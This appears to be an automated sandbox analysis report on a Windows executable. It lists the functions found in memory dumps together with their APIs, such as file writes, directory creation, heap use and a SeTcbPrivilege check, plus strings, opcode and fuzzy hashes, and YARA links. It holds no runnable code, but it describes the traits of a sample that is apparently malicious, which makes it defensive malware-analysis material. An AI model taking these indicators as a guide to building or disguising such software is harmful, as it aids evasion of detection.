Opcode ID: acf638796d488d817d77c54934f7f5ba4dd161d43cf934193134bb0ea19de19d
Instruction ID: 7b8449840623692bb50d688bb88083228c7318acb737dce027997f6ce1f759fa
Opcode Fuzzy Hash: acf638796d488d817d77c54934f7f5ba4dd161d43cf934193134bb0ea19de19d
Instruction Fuzzy Hash: 3C31D2B190021AABDF209FA6CC41DAFBBB9EF84314F05412AF90497251E7388D55C799

Uniqueness

Uniqueness Score: -1.00%

Function 0045E216, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045E2C9

Strings

~`|+, xrefs: 0045E235, 0045E28F, 0045E2CE
1E, xrefs: 0045E2B9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: 1E$~`|+
API String ID: 269201875-1217782799
Opcode ID: 55ce217e8f0791b3266c79c7a13ee253a4ab9b21e1d4283a8933b61bd0633b8e
Instruction ID: e4775acf540488b85228e91027ecf1adb4bb728911a24e22704fd34e0bf2fa68
Opcode Fuzzy Hash: 55ce217e8f0791b3266c79c7a13ee253a4ab9b21e1d4283a8933b61bd0633b8e
Instruction Fuzzy Hash: 4B319176A00610DF8B08CF9EC48045EB7F5FF8D320B2586A6E915EB365C730AE05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0044AF30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0044AFBF
__Mtx_init_in_situ.LIBCPMT ref: 0044AFFE

Strings

~`|+, xrefs: 0044AF43

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Mtx_init_in_situMtx_unlock
String ID: ~`|+
API String ID: 4113383456-3443854377
Opcode ID: 4b23f94c30598c458592bb7fe80966306d0966b4fd4bb8c340d1a1fee4343895
Instruction ID: 0fd62595aa9fbbb9f1515855d662376a316d01158d2166b39f1fb758a8f642f6
Opcode Fuzzy Hash: 4b23f94c30598c458592bb7fe80966306d0966b4fd4bb8c340d1a1fee4343895
Instruction Fuzzy Hash: 002127B1E4420C5BEB20DF659D42B6A77A4EB00B18F00053BF905937C1E77DAD14869E

Uniqueness

Uniqueness Score: -1.00%

Function 0043A670, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004403F0: GetCurrentProcess.KERNEL32(00000008,2B7C607E,?,?), ref: 00440437
Part of subcall function 004403F0: GetCurrentProcess.KERNEL32(00000020,SeTcbPrivilege,0000000E), ref: 004404B1
Part of subcall function 004403F0: GetLastError.KERNEL32 ref: 0044052A

CreateDirectoryW.KERNEL32(?,00000000,00000000,?,?,?), ref: 0043A759

Strings

~`|+, xrefs: 0043A6F5
~`|+, xrefs: 0043A686

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$CreateDirectoryErrorLast
String ID: ~`|+$~`|+
API String ID: 2044654983-2422257929
Opcode ID: ee17293540ef871763b2235d7d156d3d5fb5ee954a715a3fb426c49b095c6e02
Instruction ID: db6093b31d26f98f1e79405c217f1296bc0413f66d7bfe0392ec249a763e48ef
Opcode Fuzzy Hash: ee17293540ef871763b2235d7d156d3d5fb5ee954a715a3fb426c49b095c6e02
Instruction Fuzzy Hash: 2731E371A10114DBCB04EFA5D841B9EB774FF19718F90006FF401A7292EB38AA59CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00462F74, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,00000000,?,00463396,0045B9AA,00000001,00000000,0045BA1B,?,?), ref: 0046301E
GetLastError.KERNEL32(?,00463396,0045B9AA,00000001,00000000,0045BA1B,?,?,?,0045B9AA,?,?,?,004ED2E0,0000002C,0045BA1B), ref: 00463044

Strings

~`|+, xrefs: 00462F83

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: ~`|+
API String ID: 442123175-3443854377
Opcode ID: 34914d75d58142f3348f37d3f952bbf5c019902d93d637bc7038c518e0feea4f
Instruction ID: e09fedd25a7faf823f2b84b90e10df0d1b4b52b34b58675b97e7ae825c81af02
Opcode Fuzzy Hash: 34914d75d58142f3348f37d3f952bbf5c019902d93d637bc7038c518e0feea4f
Instruction Fuzzy Hash: EB21A031A00218EFCF14CF19CD809EAB3B9FF49305B1445AAEA09D7291E734DE85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004480B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 004507BA: RaiseException.KERNEL32(E06D7363,00000001,00000003,EH,?,?,?,0048450D,?,004ECD68,?,?,004F5494), ref: 0045081A

___std_exception_copy.LIBVCRUNTIME ref: 00448152

Strings

Clone() is not implemented yet., xrefs: 004480D5
~`|+, xrefs: 004480C4, 00448124

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: Clone() is not implemented yet.$~`|+
API String ID: 3109751735-4200923852
Opcode ID: fd3f40e5381f843d00d6d788af6ff3b000a781f602d6dbf2a0da6bd8f3239163
Instruction ID: 2934e0eb25e0b6e1d166ef222ab99456a9253a92b2239dc8009f1d9a09876a3e
Opcode Fuzzy Hash: fd3f40e5381f843d00d6d788af6ff3b000a781f602d6dbf2a0da6bd8f3239163
Instruction Fuzzy Hash: 532153B1904609EFC700DF55D941F9AF7FCFB59714F10862BE511A3640EB78AA14CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00462E99, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,00000000,?,004633B6,0045B9AA,00000001,00000000,0045BA1B,?,?), ref: 00462F35
GetLastError.KERNEL32(?,004633B6,0045B9AA,00000001,00000000,0045BA1B,?,?,?,0045B9AA,?,?,?,004ED2E0,0000002C,0045BA1B), ref: 00462F5B

Strings

~`|+, xrefs: 00462EA8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastWrite
String ID: ~`|+
API String ID: 442123175-3443854377
Opcode ID: 210d8d595a835bd4d4244d65d43f88ed7900a02ccbc98def0d8bc7196aecad0a
Instruction ID: 0c6a69111a71837bd3813877c1a2c2a2abf979f8cc950cc7139b7408d1c080ae
Opcode Fuzzy Hash: 210d8d595a835bd4d4244d65d43f88ed7900a02ccbc98def0d8bc7196aecad0a
Instruction Fuzzy Hash: FE21B630A001199FCF19CF19DD809D9B7B9FB4D301F1040AAE905D7251E674DE42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044D0DC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(?,?,?,?,?), ref: 0044D189

Part of subcall function 004507BA: RaiseException.KERNEL32(E06D7363,00000001,00000003,EH,?,?,?,0048450D,?,004ECD68,?,?,004F5494), ref: 0045081A

Part of subcall function 0045C6B7: IsProcessorFeaturePresent.KERNEL32(00000017,0044D1A5,?), ref: 0045C6D3

Strings

csm, xrefs: 0044D118
~`|+, xrefs: 0044D0E2

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor
String ID: csm$~`|+
API String ID: 1492173874-3761916771
Opcode ID: d5b683c192126297d3148cb28e7098016ffd727140ea4bd97cc30515534057d7
Instruction ID: 57025a0c3f9292961b4ca839444a9bc7e05fcbc53de7c06571aa3c3501b8217d
Opcode Fuzzy Hash: d5b683c192126297d3148cb28e7098016ffd727140ea4bd97cc30515534057d7
Instruction Fuzzy Hash: 0521C231D00218ABEF24EFA5D885AAFB7B5BF44715F54001BE906AB354C738AD44CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004AB1E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004AB240
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004AB28B

Strings

pContext, xrefs: 004AB283

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 42dfe78019a632c90cd01f91cb803c1aea3b1530131b7e3c1dfca06c5daf1a9c
Instruction ID: ca920e751ce3f9edc763f2c4ce60d4d6b5ef50925b53afcad8ac2400dea9220d
Opcode Fuzzy Hash: 42dfe78019a632c90cd01f91cb803c1aea3b1530131b7e3c1dfca06c5daf1a9c
Instruction Fuzzy Hash: 92112732A001149BCF05FF69D89966D7765EF95350B1540ABED019B343DB3CEC058BC8

Uniqueness

Uniqueness Score: -1.00%

Function 00428F80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00428FA6
std::_Lockit::~_Lockit.LIBCPMT ref: 0042903A

Part of subcall function 0045997B: _free.LIBCMT ref: 0045998E

Strings

~`|+, xrefs: 00428F92

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~__free
String ID: ~`|+
API String ID: 2189227594-3443854377
Opcode ID: d31afc64d1433bf671148437db91fb88a928b14b8ba3d24ac179b738d6ae2154
Instruction ID: 9dc8a78e7d7652ea5a5bf35a36c66be7956f46323382f65e15bc7b3a07ba72b5
Opcode Fuzzy Hash: d31afc64d1433bf671148437db91fb88a928b14b8ba3d24ac179b738d6ae2154
Instruction Fuzzy Hash: 83112EF1A047409BEB20DF26D905B57B3ECAB05714F04452EE84AC7746EB79FD088B99

Uniqueness

Uniqueness Score: -1.00%

Function 004380D0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00438128

Strings

cxC, xrefs: 00438103
~`|+, xrefs: 004380E7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: cxC$~`|+
API String ID: 2659868963-3041772622
Opcode ID: 7756f25882413f491934bdafd33f1ef8e45bd57600ed29ec14cab38b3ed2dd67
Instruction ID: 0ec99087f44c0163c4cf99e4d274be2c312d7e973989bf487666d20016e46e25
Opcode Fuzzy Hash: 7756f25882413f491934bdafd33f1ef8e45bd57600ed29ec14cab38b3ed2dd67
Instruction Fuzzy Hash: 6F215EB1900705EFCB10CF55C980B86BBF8FB45314F50826BE8159B741E778A558CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0044EFB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0044F8EB
___raise_securityfailure.LIBCMT ref: 0044F9D2

Strings

~`|+, xrefs: 0044F9B3

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: ~`|+
API String ID: 3761405300-3443854377
Opcode ID: 82e889da4efb3031ec92605002271c48173a06bc2aaeb59d734c71516ec16875
Instruction ID: eb1ee4fb552fc8ca96582b9cb32e1989d9f19f63e5e8d4963818442ca7de3842
Opcode Fuzzy Hash: 82e889da4efb3031ec92605002271c48173a06bc2aaeb59d734c71516ec16875
Instruction Fuzzy Hash: BE21B0F4611204AEE700DF15E9466613BA4BB4C354F10643AE60D8A3A1E7B855B9CF4F

Uniqueness

Uniqueness Score: -1.00%

Function 004507BA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,EH,?,?,?,0048450D,?,004ECD68,?,?,004F5494), ref: 0045081A

Strings

EH, xrefs: 004507C5
EH, xrefs: 00450807, 0045080A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID: EH$EH
API String ID: 3997070919-422375217
Opcode ID: dfc00f6f9575268f0d816d4008ec38f16fb1485a707e8f0157fc947c72b97eb6
Instruction ID: 3fbe5a60a713af641d77c648e733ca837a727ba1451f6ca78e3aa648d3eaddc6
Opcode Fuzzy Hash: dfc00f6f9575268f0d816d4008ec38f16fb1485a707e8f0157fc947c72b97eb6
Instruction Fuzzy Hash: 08018F75900208ABCB05EF5CD980BAEBBB8EF48700F15415AEE04AB3A2D770AD00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0043F690, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001), ref: 0043F703
VerifyVersionInfoW.KERNEL32(?,00000080,00000000), ref: 0043F715

Strings

~`|+, xrefs: 0043F69C

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ConditionInfoMaskVerifyVersion
String ID: ~`|+
API String ID: 3739615805-3443854377
Opcode ID: 079a617611b8021e474ea29ceef901ddd9fe1bef0d86400c4cbd4d9d0619f0d0
Instruction ID: ed84df8a0f263c04304e3f3f061bfb245f46c104d5a74a33388f0b892fd87958
Opcode Fuzzy Hash: 079a617611b8021e474ea29ceef901ddd9fe1bef0d86400c4cbd4d9d0619f0d0
Instruction Fuzzy Hash: F401FFB05153049FE760DF60DD0ABAB7BE8AB84714F00491DFA98862C1DBB895588BD6

Uniqueness

Uniqueness Score: -1.00%

Function 0049B720, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049B750

Strings

pScheduler, xrefs: 0049B748
version, xrefs: 0049B735

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 8e9f0771cb161d375d41c9701286eefaa401e09d596d5eda2f4e5ab3c56f49e6
Instruction ID: 64d70e3a87e0155580edcb3cae982c721cd68915fccdd7f1dba9e313db5f804c
Opcode Fuzzy Hash: 8e9f0771cb161d375d41c9701286eefaa401e09d596d5eda2f4e5ab3c56f49e6
Instruction Fuzzy Hash: 88E0863044030CB6CF11FBA6E95AFCD7F65DB50349F108177785125192D7BC9589DA8D

Uniqueness

Uniqueness Score: -1.00%

Function 004667FA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,00466A6C,?,00000000,0045BF6A,0045BF6A,00000000,00000000,?), ref: 00466825
GetACP.KERNEL32(00000000,00466A6C,?,00000000,0045BF6A,0045BF6A,00000000,00000000,?), ref: 0046683C

Strings

ljF, xrefs: 00466802, 0046685F

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ljF
API String ID: 0-3189869790
Opcode ID: 24aac3795d0c39fcff77bca3d724aa11b1823ffb64cf6af255035f799b776558
Instruction ID: 6ae16199a8e6d706166e7e818c030fadfb454315748e073a7d6bc839dda2714b
Opcode Fuzzy Hash: 24aac3795d0c39fcff77bca3d724aa11b1823ffb64cf6af255035f799b776558
Instruction Fuzzy Hash: 48F031709003409FDF10EB68D88CB697770AB41339F29075DD539871E1D7755C89C78A

Uniqueness

Uniqueness Score: -1.00%

Function 004A5150, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 004A5172
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A5185

Strings

pContext, xrefs: 004A517D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 5cb329051d72c1a68444f3bffcdb361bba3d84c0d444c1e85bd3902a23303e42
Instruction ID: f95028b162ff3014e271bab579b4acb19acd27b03820761adb6fb417cc022453
Opcode Fuzzy Hash: 5cb329051d72c1a68444f3bffcdb361bba3d84c0d444c1e85bd3902a23303e42
Instruction Fuzzy Hash: 70E02236B0020827CA04BB3AD855C9EB7B9DFC4754714402BAA11A3382EF78AA048AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0044ED40, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,004208E4,?,?,?,?,?,?,?,0000000C), ref: 0044ED45
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED4C
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED99

Part of subcall function 0044EBDF: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,00000000,0044ED88,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC03
Part of subcall function 0044EBDF: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044EC0A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: a3f89645ad186ef37d4deb753c4a08efe29723a85833ca61b8c620248b62cbd3
